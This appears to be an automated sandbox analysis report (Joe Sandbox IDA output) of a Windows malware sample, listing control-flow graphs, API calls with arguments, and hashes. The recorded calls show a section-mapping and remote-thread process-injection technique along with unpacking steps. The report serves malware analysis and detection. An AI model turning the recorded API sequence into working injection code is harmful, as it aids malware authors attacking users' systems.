                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 284 401549-40156e call 401193 288 401570 284->288 289 401573-401578 284->289 288->289 291 401898-4018a0 289->291 292 40157e-40158f 289->292 291->289 295 4018a5-4018b7 291->295 296 401595-4015be 292->296 297 401896 292->297 303 4018c5 295->303 304 4018bc-4018e3 call 401193 295->304 296->297 305 4015c4-4015db NtDuplicateObject 296->305 297->295 303->304 305->297 308 4015e1-401605 NtCreateSection 305->308 310 401661-401687 NtCreateSection 308->310 311 401607-401628 NtMapViewOfSection 308->311 310->297 314 40168d-401691 310->314 311->310 313 40162a-401646 NtMapViewOfSection 311->313 313->310 316 401648-40165e 313->316 314->297 317 401697-4016b8 NtMapViewOfSection 314->317 316->310 317->297 319 4016be-4016da NtMapViewOfSection 317->319 319->297 321 4016e0 call 4016e5 319->321
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                  • String ID:
                                                                  • API String ID: 1546783058-0
                                                                  • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                  • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                  • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                  • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 323 401557 324 40155b-40156e call 401193 323->324 325 40154f-401554 323->325 328 401570 324->328 329 401573-401578 324->329 325->324 328->329 331 401898-4018a0 329->331 332 40157e-40158f 329->332 331->329 335 4018a5-4018b7 331->335 336 401595-4015be 332->336 337 401896 332->337 343 4018c5 335->343 344 4018bc-4018e3 call 401193 335->344 336->337 345 4015c4-4015db NtDuplicateObject 336->345 337->335 343->344 345->337 348 4015e1-401605 NtCreateSection 345->348 350 401661-401687 NtCreateSection 348->350 351 401607-401628 NtMapViewOfSection 348->351 350->337 354 40168d-401691 350->354 351->350 353 40162a-401646 NtMapViewOfSection 351->353 353->350 356 401648-40165e 353->356 354->337 357 401697-4016b8 NtMapViewOfSection 354->357 356->350 357->337 359 4016be-4016da NtMapViewOfSection 357->359 359->337 361 4016e0 call 4016e5 359->361
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                  • String ID:
                                                                  • API String ID: 1546783058-0
                                                                  • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                  • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                  • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                  • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 364 402f97-402fbb 365 402fc1-402fd9 364->365 366 4030ee-4030f3 364->366 365->366 367 402fdf-402ff0 365->367 368 402ff2-402ffb 367->368 369 403000-40300e 368->369 369->369 370 403010-403017 369->370 371 403039-403040 370->371 372 403019-403038 370->372 373 403062-403065 371->373 374 403042-403061 371->374 372->371 375 403067-40306a 373->375 376 40306e 373->376 374->373 375->376 378 40306c 375->378 376->368 377 403070-403075 376->377 377->366 379 403077-40307a 377->379 378->377 379->366 380 40307c-4030eb RtlCreateUserThread NtTerminateProcess 379->380 380->366
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcessTerminateThreadUser
                                                                  • String ID:
                                                                  • API String ID: 1921587553-0
                                                                  • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                  • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                  • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                  • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 415c20-415c48 2 415c50-415c57 0->2 3 415c59-415c5b 2->3 4 415c5f-415c65 2->4 3->4 5 415c67-415c71 4->5 6 415c76-415c80 4->6 5->6 7 415c82-415c8e 6->7 8 415c98-415c9f 6->8 7->8 8->2 9 415ca1-415ca9 8->9 11 415cb0-415cb6 9->11 12 415cc4-415ccb 11->12 13 415cb8-415cbe 11->13 14 415cd1-415cd8 12->14 15 415ccd 12->15 13->12 14->11 16 415cda-415ce1 14->16 15->14 17 415e10-415e1e 16->17 18 415ce7-415df8 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 415e20-415e2e SetCommState 17->19 22 415e01-415e0d 18->22 23 415dfa-415dfb PulseEvent 18->23 24 415e30-415e37 19->24 25 415e39-415e40 19->25 22->17 23->22 24->19 24->25 26 415f06-415f15 call 415870 25->26 27 415e46-415f00 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA GetTimeFormatW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType 25->27 33 415f17-415f28 26->33 34 415f4d-415f58 LoadLibraryA call 4158a0 26->34 27->26 35 415f30-415f40 33->35 40 415f5d-415f6e call 415b90 34->40 38 415f42 35->38 39 415f48-415f4b 35->39 38->39 39->34 39->35 45 415f70-415f77 40->45 46 415f83-415f89 45->46 47 415f79-415f7f 45->47 48 415f90-415f97 46->48 49 415f8b call 415890 46->49 47->46 53 415fa6-415fad 48->53 54 415f99-415fa0 InterlockedDecrement 48->54 49->48 53->45 55 415faf-415fbf 53->55 54->53 57 415fc0-415fd0 55->57 58 415fd2 57->58 59 415fd9-415fdc 57->59 58->59 59->57 60 415fde-415ff0 59->60
                                                                  APIs
                                                                  • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415CF2
                                                                  • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00415D0B
                                                                  • FindAtomW.KERNEL32(00000000), ref: 00415D12
                                                                  • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00415D1A
                                                                  • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415D32
                                                                  • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415D59
                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00415D61
                                                                  • GetVersionExW.KERNEL32(?), ref: 00415D6E
                                                                  • DisconnectNamedPipe.KERNEL32(?), ref: 00415D81
                                                                  • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415DC6
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415DD5
                                                                  • LCMapStringA.KERNEL32(00000000,00000000,004183C0,00000000,?,00000000), ref: 00415DEB
                                                                  • PulseEvent.KERNEL32(00000000), ref: 00415DFB
                                                                  • SetCommState.KERNELBASE(00000000,00000000), ref: 00415E24
                                                                  • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415E55
                                                                  • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415E66
                                                                  • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415E6E
                                                                  • GetTimeFormatW.KERNEL32(00000000,00000000,?,004183EC,?,00000000), ref: 00415EAE
                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00415EB5
                                                                  • GetConsoleAliasExesLengthA.KERNEL32 ref: 00415EBB
                                                                  • GetBinaryType.KERNEL32(0041842C,?), ref: 00415ECD
                                                                  • LoadLibraryA.KERNELBASE(00418438), ref: 00415F52
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2073771249.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_40b000_vsvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
                                                                  • String ID: k`$}$
                                                                  • API String ID: 2545807588-956986773
                                                                  • Opcode ID: 87a73dc456498ccd6cf10fd0e6ff5224145c6502590b1386d6c04f00a117fefb
                                                                  • Instruction ID: 9088986ea41186524788a2102304772e7f24ba617efa9d05027aa238ecf44273
                                                                  • Opcode Fuzzy Hash: 87a73dc456498ccd6cf10fd0e6ff5224145c6502590b1386d6c04f00a117fefb
                                                                  • Instruction Fuzzy Hash: 6BA1E371845A24EBC720DB65EC44ADF7BB8EF89751F40406AF50AA7190DB381A81CFED

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 61 2cc003c-2cc0047 62 2cc004c-2cc0263 call 2cc0a3f call 2cc0e0f call 2cc0d90 VirtualAlloc 61->62 63 2cc0049 61->63 78 2cc028b-2cc0292 62->78 79 2cc0265-2cc0289 call 2cc0a69 62->79 63->62 81 2cc02a1-2cc02b0 78->81 83 2cc02ce-2cc03c2 VirtualProtect call 2cc0cce call 2cc0ce7 79->83 81->83 84 2cc02b2-2cc02cc 81->84 90 2cc03d1-2cc03e0 83->90 84->81 91 2cc0439-2cc04b8 VirtualFree 90->91 92 2cc03e2-2cc0437 call 2cc0ce7 90->92 94 2cc04be-2cc04cd 91->94 95 2cc05f4-2cc05fe 91->95 92->90 97 2cc04d3-2cc04dd 94->97 98 2cc077f-2cc0789 95->98 99 2cc0604-2cc060d 95->99 97->95 101 2cc04e3-2cc0505 97->101 102 2cc078b-2cc07a3 98->102 103 2cc07a6-2cc07b0 98->103 99->98 104 2cc0613-2cc0637 99->104 112 2cc0517-2cc0520 101->112 113 2cc0507-2cc0515 101->113 102->103 105 2cc086e-2cc08be LoadLibraryA 103->105 106 2cc07b6-2cc07cb 103->106 107 2cc063e-2cc0648 104->107 111 2cc08c7-2cc08f9 105->111 109 2cc07d2-2cc07d5 106->109 107->98 110 2cc064e-2cc065a 107->110 114 2cc0824-2cc0833 109->114 115 2cc07d7-2cc07e0 109->115 110->98 116 2cc0660-2cc066a 110->116 117 2cc08fb-2cc0901 111->117 118 2cc0902-2cc091d 111->118 119 2cc0526-2cc0547 112->119 113->119 123 2cc0839-2cc083c 114->123 120 2cc07e4-2cc0822 115->120 121 2cc07e2 115->121 122 2cc067a-2cc0689 116->122 117->118 127 2cc054d-2cc0550 119->127 120->109 121->114 124 2cc068f-2cc06b2 122->124 125 2cc0750-2cc077a 122->125 123->105 126 2cc083e-2cc0847 123->126 128 2cc06ef-2cc06fc 124->128 129 2cc06b4-2cc06ed 124->129 125->107 130 2cc0849 126->130 131 2cc084b-2cc086c 126->131 133 2cc0556-2cc056b 127->133 134 2cc05e0-2cc05ef 127->134 135 2cc06fe-2cc0748 128->135 136 2cc074b 128->136 129->128 130->105 131->123 137 2cc056d 133->137 138 2cc056f-2cc057a 133->138 134->97 135->136 136->122 137->134 139 2cc057c-2cc0599 138->139 140 2cc059b-2cc05bb 138->140 145 2cc05bd-2cc05db 139->145 140->145 145->127
                                                                  APIs
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02CC024D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2075651122.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_2cc0000_vsvrjra.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: cess$kernel32.dll
                                                                  • API String ID: 4275171209-1230238691
                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                  • Instruction ID: eb4fb2c8579feb1d98d09637ed203926217431dc0c01c4b43d6d7397d26ae795
                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                  • Instruction Fuzzy Hash: 83526974A01229DFDB64CF58C984BACBBB1BF09304F1480E9E94DAB351DB30AA95DF14

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 363 4158a0-4159e0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(02B19CE8), ref: 0041597F
                                                                  • GetProcAddress.KERNEL32(00000000,0041BCD0), ref: 004159BC
                                                                  • VirtualProtect.KERNELBASE(02B19B2C,02B19CE4,00000040,?), ref: 004159DB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2073771249.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_40b000_vsvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 2099061454-3916222277
                                                                  • Opcode ID: c9706728d37e00871e7f67ced595d0c79eb19ddcf454875c36666ff37d1ec3ad
                                                                  • Instruction ID: 9f4e34dfc4b6fe9394a1db25d0a6d7b53828682d58b9ddec5cea0b2bad73ce3c
                                                                  • Opcode Fuzzy Hash: c9706728d37e00871e7f67ced595d0c79eb19ddcf454875c36666ff37d1ec3ad
                                                                  • Instruction Fuzzy Hash: 3D3167149487C0CAE301CB78F8547823FA2EB25744F44847CD189873A5EFBA1524D7EE

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 381 2d7a63e-2d7a657 382 2d7a659-2d7a65b 381->382 383 2d7a662-2d7a66e CreateToolhelp32Snapshot 382->383 384 2d7a65d 382->384 385 2d7a670-2d7a676 383->385 386 2d7a67e-2d7a68b Module32First 383->386 384->383 385->386 393 2d7a678-2d7a67c 385->393 387 2d7a694-2d7a69c 386->387 388 2d7a68d-2d7a68e call 2d7a2fd 386->388 391 2d7a693 388->391 391->387 393->382 393->386
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D7A666
                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 02D7A686
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2075795209.0000000002D77000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D77000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_2d77000_vsvrjra.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                  • String ID:
                                                                  • API String ID: 3833638111-0
                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                  • Instruction ID: 194f3d55e163c57cb0267fe4bae167178ca8d7db861fd52beb93c5b5f9b202d7
                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                  • Instruction Fuzzy Hash: B6F09636500B10ABD7203BF9988DB6E76E8AF49628F100528E646916C0EB78EC458A61

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 394 2cc0e0f-2cc0e24 SetErrorMode * 2 395 2cc0e2b-2cc0e2c 394->395 396 2cc0e26 394->396 396->395
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,02CC0223,?,?), ref: 02CC0E19
                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,02CC0223,?,?), ref: 02CC0E1E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2075651122.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_2cc0000_vsvrjra.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                  • Instruction ID: 59145803a341f42eb765d6959b20131ad0ef228589562980b91258829723d85c
                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                  • Instruction Fuzzy Hash: 72D01231145128B7D7003A94DC09BCD7B1CDF05B66F108011FB0DD9080C770964046E5

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 397 4018e6-40194b call 401193 Sleep call 40141f 411 40195a-4019a5 call 401193 397->411 412 40194d-401955 call 401514 397->412 412->411
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                    • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                    • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                    • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                  • String ID:
                                                                  • API String ID: 1885482327-0
                                                                  • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                  • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                  • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                  • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 426 401915-401918 427 4018c6-4018c7 426->427 428 40191a-40194b call 401193 Sleep call 40141f 426->428 429 4018d7 427->429 430 4018ce-4018e3 call 401193 427->430 440 40195a-4019a5 call 401193 428->440 441 40194d-401955 call 401514 428->441 429->430 441->440
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                    • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                    • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                    • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                  • String ID:
                                                                  • API String ID: 1885482327-0
                                                                  • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                  • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                  • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                  • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 455 4018f1-40194b call 401193 Sleep call 40141f 465 40195a-4019a5 call 401193 455->465 466 40194d-401955 call 401514 455->466 466->465
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                    • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                    • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                    • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                  • String ID:
                                                                  • API String ID: 1885482327-0
                                                                  • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                  • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                  • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                  • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 480 401912-40194b call 401193 Sleep call 40141f 491 40195a-4019a5 call 401193 480->491 492 40194d-401955 call 401514 480->492 492->491
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                    • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                    • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                    • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                  • String ID:
                                                                  • API String ID: 1885482327-0
                                                                  • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                  • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                  • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                  • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                  APIs
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02D7A34E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2075795209.0000000002D77000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D77000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_2d77000_vsvrjra.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                  • Instruction ID: b5a6d2207a1586b9011399bcae5568eecdf95c6c5d9ad65ff51adf11fbf776e6
                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                  • Instruction Fuzzy Hash: 9E112A79A00208EFDB01DF98C985E98BBF5AB08350F158094F9489B361E375EA50DF90
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                    • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                    • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                    • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                  • String ID:
                                                                  • API String ID: 1885482327-0
                                                                  • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                  • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                  • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                  • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                  APIs
                                                                  • LocalAlloc.KERNELBASE(00000000,02B19CE4,00415F0B), ref: 00415878
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2073771249.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_40b000_vsvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: AllocLocal
                                                                  • String ID:
                                                                  • API String ID: 3494564517-0
                                                                  • Opcode ID: edc34b9f6b4820ea05e34d55aad0c07fdf7bc1d6d5b6794533697c47ab2511c9
                                                                  • Instruction ID: d7b87d211da148203f6924bb85ac0980f9e485e76abd759aca5fb629b3ee17cc
                                                                  • Opcode Fuzzy Hash: edc34b9f6b4820ea05e34d55aad0c07fdf7bc1d6d5b6794533697c47ab2511c9
